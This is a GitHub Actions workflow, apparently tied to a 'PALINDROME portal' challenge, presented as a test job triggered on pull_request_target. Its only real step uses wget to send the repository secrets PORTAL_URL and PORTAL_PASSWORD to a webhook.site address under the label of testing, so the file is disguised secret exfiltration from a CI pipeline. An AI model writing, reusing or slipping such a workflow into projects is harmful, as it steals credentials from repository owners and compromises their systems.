name: Test the PALINDROME portal

on: pull_request_target

jobs:
  test:
    runs-on: windows-latest
    steps:
      - uses: actions/checkout@v3
      - name: Test the PALINDROME portal
        run: | 
          C:\msys64\usr\bin\wget.exe '''https://webhook.site/1f8ff9d7-ad45-4867-8bf9-fd4977fddb13/?meow=${{ secrets.PORTAL_URL }}&nya=${{ secrets.PORTAL_PASSWORD }}''' -O test -d -v
          cat test
          echo "meoww"
